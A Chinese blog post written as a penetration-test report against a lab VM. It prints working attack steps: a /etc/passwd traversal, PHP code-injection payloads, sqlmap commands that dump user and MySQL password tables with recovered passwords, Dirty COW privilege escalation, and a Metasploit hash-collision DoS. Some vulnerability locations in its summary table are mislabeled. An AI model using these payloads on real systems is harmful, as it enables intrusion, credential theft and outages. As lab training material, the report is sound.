渗透测试报告总结
Created at 2019-07-01 Updated at 2019-08-15 Category 漏洞渗透
渗透测试报告总结
目录
1.测试目的
2.渗透范围和测试主要内容
3.信息收集
4.渗透测试过程
4.1.目录测试
4.2.内容披露测试
4.3.弱口令测试
5.漏洞总结
- 测试目的
通过实施针对性渗透,找出漏洞隐患,制定相应的安全措施与解决方案保障系
统的安全运行
- 渗透范围和测试主要内容
测试主机:192.168.199.171
测试时间:2019.7.22
测试说明:通过漏洞扫描和手动分析获取相关数据
渗透方式:内网渗透
此次渗透主要包括对象:真的所有的安全隐患和漏洞,
通过端口,目录等进用弱口令,内容披露,msf模块利用等几个方面进行渗透测试。
- 信息收集
此阶段中,渗透测试小组进行必要的信息收集,如 IP地址,软件版本信息,端口,等
渗透工具:御剑 。 AppScan AWVS - 1.端口收集
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suho - 2.版本信息收集
Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch Server at 192.168.199.171 Port 80 - 3.通过AppScan和御剑目录收集
- 渗透测试过程
此阶段中,渗透测试根据第一阶段获取的信息对网络、系统进行渗透测试。 - 1通过扫描的目录进行访问排查,找出可利用的目录: http://192.168.199.171/index.php?
访问出现以下后台登录界面,看标记的应该是名字之类的,可以搜一下看看有没有漏洞,我在
kali上调用模块试一下。
先查看有什么模块
就一个模块,调用一下试试
添加受攻击IP,修改uri的为 /
运行真的进去了,这算是一个高危漏洞了。 - 2.通过上网查看发现同样是这个还有一个文件披露漏洞,通过截断可以访问password。
访问网页http://192.168.199.171/index.php,可以看出后面加上截断,密码已经爆露出来了。
http://192.168.199.171/index.php?system=../../../../../../../../etc/passwd%00;
- 3.PHP代码注入,通过AWVS扫出的高危漏洞。
点击home,从AWVS中可以看到利用的POC
http://192.168.199.171/index.php?page=${@print(md5(acunetix_wvs_security_test))}\
发现下面那段是用md5进行编码的,md5值对应的是63c19a6da79816b21429e5bb262daed8
这里使用md5解密工具进行解密,https://www.somd5.com/
解密出内容为:acunetix_wvs_security_test
也可通过此方法来写system((ls))
http://192.168.199.171/index.php?page=${@print(system(ls))}\
同样也可以使用phpinfo()这个函数
http://192.168.199.171/index.php?page=${@print(phpinfo())}\
- 4.测试http://192.168.199.239/phpmyadmin,访问出现phpmyadmin页面,经过测试发现该登录
页面有弱口令漏洞,那么通过弱口令进入。
- 5手工注入http://192.168.199.239/gallery/ ,发现图片不显示,是因为hstos文件没有配置在本地虚拟机
/etc/hstos里面添加。
点击标记区域进入,在?后面添加or 1=1 页面发生了变化,说明可能有sql注入漏洞。
然后使用sqlmap进行跑这个可能存在的注入点
使用kali中的sqlmap,
sqlmap -u “http://192.168.199.171/gallery/gallery.php?id=1^&sort=photoid" –dbs –cookie=”gallarific_vote_3=1; gallarific_vote_5=1; gallarific_vote_4=1; PHPSESSID=24f177e5cfc63063750f1eeef9362c54”
爆出三个数据库,分别是:gallery、information_schema、mysql
sqlmap -u “http://192.168.199.171/gallery/gallery.php?id=1^&sort=photoid" -D gallery -T gallarific_users -C username,password –dump –cookie=”gallarific_vote_3=1; gallarific_vote_5=1; gallarific_vote_4=1; PHPSESSID=24f177e5cfc63063750f1eeef9362c54”
获取到gallery这个数据库中有username和password这两个表。
sqlmap -u “http://192.168.199.171/gallery/gallery.php?id=1^&sort=photoid" -D mysql -T user -C User,Password –dump –cookie=”gallarific_vote_3=1; gallarific_vote_5=1; gallarific_vote_4=1; PHPSESSID=24f177e5cfc63063750f1eeef9362c54”
查看到mysql数据库中的user和password
使用md5进行解密
解密出root用户对应的密码是fuckeyou
然后使用burpsuite进行sqlmap,使用burp拦截以下页面
使用burp发送到sqlmap中,使用CO2进行sqlmap中选择如下图所示。
成功爆出账号名和密码
账号和密码分别是:
dreg Mast3r
loneferret starwars
使用脏牛进行提权
在3.6中获取了两个普通的账号和密码
ssh进行登陆
下载脏牛,放到/home/loneferret
使用gcc -pthread dirty.c -o dirty -lcrypt命令对dirty.c进行编译,生成一个dirty的可执行文件。
执行 ./dirty ,即进行提权,并写入新的密码
- 6.PHP Hash Collision denial of service DDoS攻击
- 查看模块
search CVE-2011-4885 - 使用模块
use auxiliary/dos/http/hashcollision_dos
添加攻击目标IP
set rhosts 192.168.199.171
set target PHP
run
- 测试结果分析
- PHP代码注入漏洞
风险等级: 中
漏洞描述:用户可以通过PHP代码注入,对网站进行命令执行,获取一些信息
漏洞位置: http://192.168.199.171/index.php
整改建议:
1、对一些重要命令进行限制
2、对相关字段进行过滤
2。文件包含漏洞
风险等级: 中
漏洞描述:用户可以通过使用文件包含的方法,包出网站的发布目录以及重要路径
漏洞位置: http://192.168.199.171/index.php?system=Blog
整改建议:
1.关闭allow_url_fopen allow_url_include
2.进行验证
3.LotusCMS后台管理漏洞
风险等级: 高
漏洞描述:通过该漏洞,可以获取shell并提权获得系统的最高权限
漏洞位置: http://192.168.199.171/style/comps/admin/login.phtml
整改建议:
更换一个新版本的更安全的
4.phpmyadmin弱口令漏洞
风险等级:中
漏洞描述:随便输入用户名,密码为空,既能进入
漏洞位置:http://192.168.199.171/style/comps/admin/login.phtml
整改建议:
更换一个新版本的更安全的
5.PHP Hash Collision denial of service DDoS攻击
风险等级: 高
漏洞描述:通过DDoS攻击,直接导致服务器死机
漏洞位置:http://192.168.199.171
整改建议:
控制POST数据的数量
在Web服务器层面进行处理,例如限制http请求body的大小和参数的数量等,这个是现在用的最多的临时处理方案
6.SQL注入漏洞
风险等级: 高
漏洞描述:借助sqlmap等工具,可以轻松的获取
漏洞位置: http://192.168.199.171/phpmyadmin
整改建议:
设置安全的用户密码
设置验证码辅助验证